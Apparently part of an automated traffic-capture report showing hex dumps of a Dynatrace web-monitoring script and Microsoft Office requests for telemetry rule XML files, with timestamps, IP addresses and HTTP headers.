                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:55 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 341434
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000658dd7be8571f1f7ca698feeab004b4b39c1dddf24a7e041e7ed879196bfbed908e430d8e0113000e630a5c08f412de3ee122bc2f1598953a857ecf7349bd26d67667d8c11f87e19abfac47d2e2055f31d93db59e04640af; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC14028INData Raw: 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 61 6e 64 20 6c 69 63 65 6e 73 65 73 20 73 65 65 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 79 6e 61 74 72 61 63 65 2e 63 6f 6d 2f 63 6f 6d 70 61 6e 79 2f 74 72 75 73 74 2d 63 65 6e 74 65 72 2f 63 75 73 74 6f 6d 65 72 73 2f 72 65 70 6f 72 74 73 2f 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 4b 61 28 29 7b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 22 22 2e 63 6f 6e 63 61 74 28 22 5f 5f 64 54 43 6f 6f 6b 69 65 22 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 22 31 22 2c 22 3b 53 61 6d 65 53 69 74 65 3d 4c 61 78 22 29 3b 76 61 72 20 4f 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 69 6e 63 6c 75 64 65 73 28 22 5f 5f 64 54 43 6f 6f 6b 69 65 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f
                                                                                                                                                                                                                                                                                                                                      Data Ascii: /* Copyright and licenses see https://www.dynatrace.com/company/trust-center/customers/reports/ */(function(){function Ka(){document.cookie="".concat("__dTCookie","=").concat("1",";SameSite=Lax");var Oa=document.cookie.includes("__dTCookie");document.co
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC16384INData Raw: 6e 63 74 69 6f 6e 20 52 63 28 67 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 67 26 26 66 68 2e 70 75 73 68 28 67 29 7d 66 75 6e 63 74 69 6f 6e 20 69 64 28 29 7b 72 65 74 75 72 6e 20 66 68 7d 66 75 6e 63 74 69 6f 6e 20 41 61 28 29 7b 72 65 74 75 72 6e 20 53 66 7d 66 75 6e 63 74 69 6f 6e 20 4a 28 67 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 71 3d 5b 5d 2c 78 3d 30 3b 78 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 78 2b 2b 29 71 5b 78 5d 3d 0a 61 72 67 75 6d 65 6e 74 73 5b 78 5d 3b 69 66 28 22 6e 75 6d 62 65 72 22 21 3d 3d 74 79 70 65 6f 66 20 71 5b 30 5d 7c 7c 21 44 65 5b 71 5b 30 5d 5d 29 74 72 79 7b 72 65 74 75 72 6e 20 67 2e 61 70 70 6c 79 28 74 68 69 73 2c 71 29 7d 63 61 74 63 68
                                                                                                                                                                                                                                                                                                                                      Data Ascii: nction Rc(g){"function"===typeof g&&fh.push(g)}function id(){return fh}function Aa(){return Sf}function J(g){return function(){for(var q=[],x=0;x<arguments.length;x++)q[x]=arguments[x];if("number"!==typeof q[0]||!De[q[0]])try{return g.apply(this,q)}catch
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC16384INData Raw: 3f 76 6f 69 64 20 30 3a 76 61 2e 67 65 74 49 74 65 6d 28 22 64 74 41 64 6b 53 65 74 74 69 6e 67 73 22 29 29 7c 7c 22 22 29 2e 6f 76 65 72 6c 6f 61 64 53 74 61 74 65 3b 69 66 28 21 28 21 50 63 7c 7c 75 65 3f 30 3a 22 63 6f 6d 70 6c 65 74 65 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 58 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 0a 58 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 45 72 72 6f 72 20 64 75 72 69 6e 67 20 69 6e 69 74 43 6f 64 65 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 22 29 3b 74 72 79 7b 46 66 3d 58 61 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 7d 63 61 74 63 68 28 67 68 29 7b 7d 24 65 3d 5b 5d 3b 7a 61 28 29 3b 53 66 3d 45 63 28 29 3b 62 66 3d 5b 5d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ?void 0:va.getItem("dtAdkSettings"))||"").overloadState;if(!(!Pc||ue?0:"complete"!==document.readyState||Xa.performance&&Xa.performance.timing))throw Error("Error during initCode initialization");try{Ff=Xa.localStorage}catch(gh){}$e=[];za();Sf=Ec();bf=[]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC16384INData Raw: 20 43 6f 6e 73 69 64 65 72 20 75 70 64 61 74 69 6e 67 20 79 6f 75 72 20 63 6f 64 65 20 73 6e 69 70 70 65 74 20 66 6f 72 20 62 65 73 74 20 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 2e 22 29 7d 5d 7d 29 3b 45 28 22 44 45 42 55 47 5f 49 4e 46 4f 5f 52 45 51 55 45 53 54 45 44 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 22 76 22 2c 73 65 76 65 72 69 74 79 3a 22 49 6e 66 6f 22 2c 74 65 78 74 3a 22 53 6e 69 70 70 65 74 20 76 65 72 73 69 6f 6e 3a 20 22 2e 63 6f 6e 63 61 74 28 61 2c 0a 22 20 3b 20 4d 6f 6e 69 74 6f 72 69 6e 67 20 63 6f 64 65 3a 22 29 2e 63 6f 6e 63 61 74 28 4c 61 28 29 29 7d 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 4a 61 28 61 2c 62 29 7b 76 6f 69 64 20 30 3d 3d 3d 62 26 26 28 62 3d 5b 5d 29 3b 76 61 72 20 66 3d 42 62
                                                                                                                                                                                                                                                                                                                                      Data Ascii: Consider updating your code snippet for best compatibility.")}]});E("DEBUG_INFO_REQUESTED",function(){return[{type:"v",severity:"Info",text:"Snippet version: ".concat(a," ; Monitoring code:").concat(La())}]})}function Ja(a,b){void 0===b&&(b=[]);var f=Bb
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC16384INData Raw: 5b 4d 2b 2b 5d 29 26 32 35 35 5d 3b 79 3d 28 6b 5e 2d 31 29 3e 3e 3e 30 3b 2d 31 21 3d 3d 79 26 26 28 62 2e 63 72 63 3d 79 29 7d 74 28 62 2c 22 76 69 22 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 2e 53 62 28 22 76 69 22 29 7c 7c 50 68 28 29 29 29 3b 74 28 62 2c 0a 22 62 70 22 2c 33 29 3b 74 28 62 2c 22 76 22 2c 75 69 29 3b 74 28 62 2c 22 61 70 70 22 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 49 63 28 22 61 70 70 22 29 29 29 3b 74 28 62 2c 22 74 79 70 65 22 2c 22 6a 73 33 22 29 3b 74 28 62 2c 22 64 74 41 64 6b 22 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 24 61 28 22 64 74 41 64 6b 22 2c 66 29 29 29 3b 74 28 62 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 22 29 3b 74 28 62 2c 22 6d 6f 64 69 66 69 65
                                                                                                                                                                                                                                                                                                                                      Data Ascii: [M++])&255];y=(k^-1)>>>0;-1!==y&&(b.crc=y)}t(b,"vi",encodeURIComponent(a.Sb("vi")||Ph()));t(b,"bp",3);t(b,"v",ui);t(b,"app",encodeURIComponent(Ic("app")));t(b,"type","js3");t(b,"dtAdk",encodeURIComponent($a("dtAdk",f)));t(b,"contentType","");t(b,"modifie
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC16384INData Raw: 6e 20 30 3c 70 2e 6c 65 6e 67 74 68 3f 28 61 3d 5b 77 64 28 66 2c 22 45 72 72 6f 72 22 29 2c 77 64 28 62 2c 0a 22 57 61 72 6e 69 6e 67 22 29 2c 77 64 28 61 2c 22 49 6e 66 6f 22 29 5d 2c 5b 7b 73 65 76 65 72 69 74 79 3a 6b 2c 74 65 78 74 3a 22 22 2e 63 6f 6e 63 61 74 28 61 2e 6a 6f 69 6e 28 22 22 29 2c 22 72 65 67 61 72 64 69 6e 67 20 61 67 65 6e 74 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 22 29 2c 74 79 70 65 3a 22 63 69 22 2c 63 68 69 6c 64 72 65 6e 3a 70 7d 5d 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 77 64 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3f 22 22 2e 63 6f 6e 63 61 74 28 61 2c 22 20 22 29 2e 63 6f 6e 63 61 74 28 62 29 2e 63 6f 6e 63 61 74 28 31 3c 61 3f 22 73 22 3a 22 22 2c 22 20 22 29 3a 22 22 7d 66 75 6e 63 74 69 6f 6e 20 78 65 28
                                                                                                                                                                                                                                                                                                                                      Data Ascii: n 0<p.length?(a=[wd(f,"Error"),wd(b,"Warning"),wd(a,"Info")],[{severity:k,text:"".concat(a.join(""),"regarding agent configuration."),type:"ci",children:p}]):null}function wd(a,b){return a?"".concat(a," ").concat(b).concat(1<a?"s":""," "):""}function xe(
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC16384INData Raw: 30 2c 0a 73 75 62 74 72 65 65 3a 21 30 7d 3b 64 69 26 26 28 69 6a 3d 6e 65 77 20 64 69 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 6e 63 28 29 2c 66 3d 5b 5d 2c 6b 3d 30 3b 6b 3c 61 2e 6c 65 6e 67 74 68 3b 6b 2b 2b 29 7b 76 61 72 20 70 3d 61 5b 6b 5d 3b 22 63 68 69 6c 64 4c 69 73 74 22 3d 3d 3d 70 2e 74 79 70 65 26 26 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 70 2e 61 64 64 65 64 4e 6f 64 65 73 29 7d 69 66 28 66 2e 6c 65 6e 67 74 68 29 66 6f 72 28 61 3d 7b 74 69 6d 65 3a 62 2c 6e 6f 64 65 73 3a 66 7d 2c 62 3d 30 2c 66 3d 6a 6a 3b 62 3c 66 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 6b 3d 66 5b 62 5d 2c 70 3d 47 69 5b 6b 5d 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 70 26 26 70 28 6b 2c 61 29 2c 71 67 5b 6b 5d 2e 70
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0,subtree:!0};di&&(ij=new di(function(a){for(var b=nc(),f=[],k=0;k<a.length;k++){var p=a[k];"childList"===p.type&&f.push.apply(f,p.addedNodes)}if(f.length)for(a={time:b,nodes:f},b=0,f=jj;b<f.length;b++)k=f[b],p=Gi[k],"function"===typeof p&&p(k,a),qg[k].p
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC262INData Raw: 72 69 67 67 65 72 2c 6b 69 6e 64 3a 6c 65 2e 6b 69 6e 64 2c 68 79 64 72 61 74 65 64 3a 6c 65 2e 68 79 64 72 61 74 65 64 2c 69 64 3a 6c 65 2e 69 64 7d 29 3b 72 65 3d 21 31 3b 58 28 29 21 3d 3d 6c 69 26 26 28 72 65 3d 6c 69 2e 69 52 4f 28 24 6b 2e 42 61 29 29 3b 21 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 7c 7c 24 6b 2e 42 61 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 7c 7c 24 6b 2e 42 61 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 7c 7c 72 65 3f 71 68 3d 24 6b 3a 64 61 28 59 6b 29 7d 65 6c 73 65 20 64 61 28 22 2d 22 29 7d 7d 7d 74 72 79 7b 66 65 28 31 29 3b 59 61 3d 56 3d 7b 69 64 3a 2b 2b 42 61 2c 6e 61 6d 65 3a 72 64 28 47 62 28 29 29 2c 74 69 6d 65 73 74 61 6d 70 3a 6c 66 2c 6b 69 6e 64 3a 30 2c
                                                                                                                                                                                                                                                                                                                                      Data Ascii: rigger,kind:le.kind,hydrated:le.hydrated,id:le.id});re=!1;X()!==li&&(re=li.iRO($k.Ba));!document.referrer||$k.Ba===document.referrer||$k.Ba===document.location.href||re?qh=$k:da(Yk)}else da("-")}}}try{fe(1);Ya=V={id:++Ba,name:rd(Gb()),timestamp:lf,kind:0,
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC16384INData Raw: 3a 44 62 2c 68 79 64 72 61 74 65 64 3a 21 31 7d 3b 7a 67 28 29 3b 76 61 72 20 4d 6c 2c 61 6c 3d 6e 75 6c 6c 3d 3d 3d 28 4d 6c 3d 71 68 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 4d 6c 3f 76 6f 69 64 20 30 3a 4d 6c 2e 75 61 2c 6f 6d 3d 67 66 28 61 6c 2c 56 29 3b 52 64 28 6f 6d 29 3b 45 28 22 56 49 45 57 5f 53 54 41 42 4c 45 22 2c 4d 68 29 3b 45 28 22 41 43 54 49 4f 4e 5f 45 4e 54 45 52 45 44 22 2c 4f 65 29 3b 45 28 22 41 43 54 49 4f 4e 5f 42 45 46 4f 52 45 5f 53 45 4e 44 22 2c 62 66 29 3b 0a 45 28 22 41 43 54 49 4f 4e 5f 53 45 4e 54 22 2c 6f 69 29 3b 45 28 22 42 46 5f 43 41 43 48 45 5f 52 45 53 54 4f 52 45 44 22 2c 70 69 29 3b 66 6c 3d 54 67 28 6a 65 29 3b 45 28 22 48 49 53 54 4f 52 59 5f 41 50 49 5f 45 56 45 4e 54 22 2c 47 66 29 3b 4a 65 28 42 62 2c 22 70 6f 70
                                                                                                                                                                                                                                                                                                                                      Data Ascii: :Db,hydrated:!1};zg();var Ml,al=null===(Ml=qh)||void 0===Ml?void 0:Ml.ua,om=gf(al,V);Rd(om);E("VIEW_STABLE",Mh);E("ACTION_ENTERED",Oe);E("ACTION_BEFORE_SEND",bf);E("ACTION_SENT",oi);E("BF_CACHE_RESTORED",pi);fl=Tg(je);E("HISTORY_API_EVENT",Gf);Je(Bb,"pop
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:56 UTC16384INData Raw: 28 29 7d 3b 61 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 66 2c 6b 2c 70 29 7b 76 61 72 20 79 2c 4d 3b 76 6f 69 64 20 30 3d 3d 3d 70 26 26 28 70 3d 21 31 29 3b 74 68 69 73 2e 64 6f 6d 4e 6f 64 65 73 3d 0a 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 2e 6c 65 6e 67 74 68 3b 74 68 69 73 2e 73 74 61 72 74 3d 66 7c 7c 74 68 69 73 2e 73 74 61 72 74 3b 66 3d 21 31 3b 76 61 72 20 61 61 3d 74 68 69 73 2e 73 74 61 72 74 2c 73 61 3d 74 68 69 73 2e 73 74 6f 70 2c 6a 62 3d 74 68 69 73 2e 69 64 2c 70 62 3d 74 68 69 73 2e 5a 62 3b 62 26 26 28 74 68 69 73 2e 45 61 28 4d 61 74 68 2e 6d 61 78 28 62 2c 61 61 2c 73 61 29 29 2c 6b 26 26 28 66 3d 21 30 29 29 3b 69 66 28 70 62 29
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ()};a.prototype.close=function(b,f,k,p){var y,M;void 0===p&&(p=!1);this.domNodes=document.getElementsByTagName("*").length;this.start=f||this.start;f=!1;var aa=this.start,sa=this.stop,jb=this.id,pb=this.Zb;b&&(this.Ea(Math.max(b,aa,sa)),k&&(f=!0));if(pb)


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      30192.168.2.94975513.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:55 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 46a88b53-101e-0017-7e74-2747c7000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131155Z-16849878b787bfsh7zgp804my400000008ag00000000cr8u
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      31192.168.2.94975213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:55 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 499
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 283bb1f9-001e-0066-5cf3-2a561e000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131155Z-16849878b78p8hrf1se7fucxk80000000aeg00000000a5vf
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      32192.168.2.94975313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:55 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 4e15243a-401e-005b-2294-2a9c0c000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131155Z-17c5cb586f69w69mgazyf263an00000008s000000000e40d
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      33192.168.2.94975613.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:55 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 3a46b3a2-501e-008f-78cb-279054000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131155Z-15b8d89586f42m673h1quuee4s0000000dkg00000000dguf
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
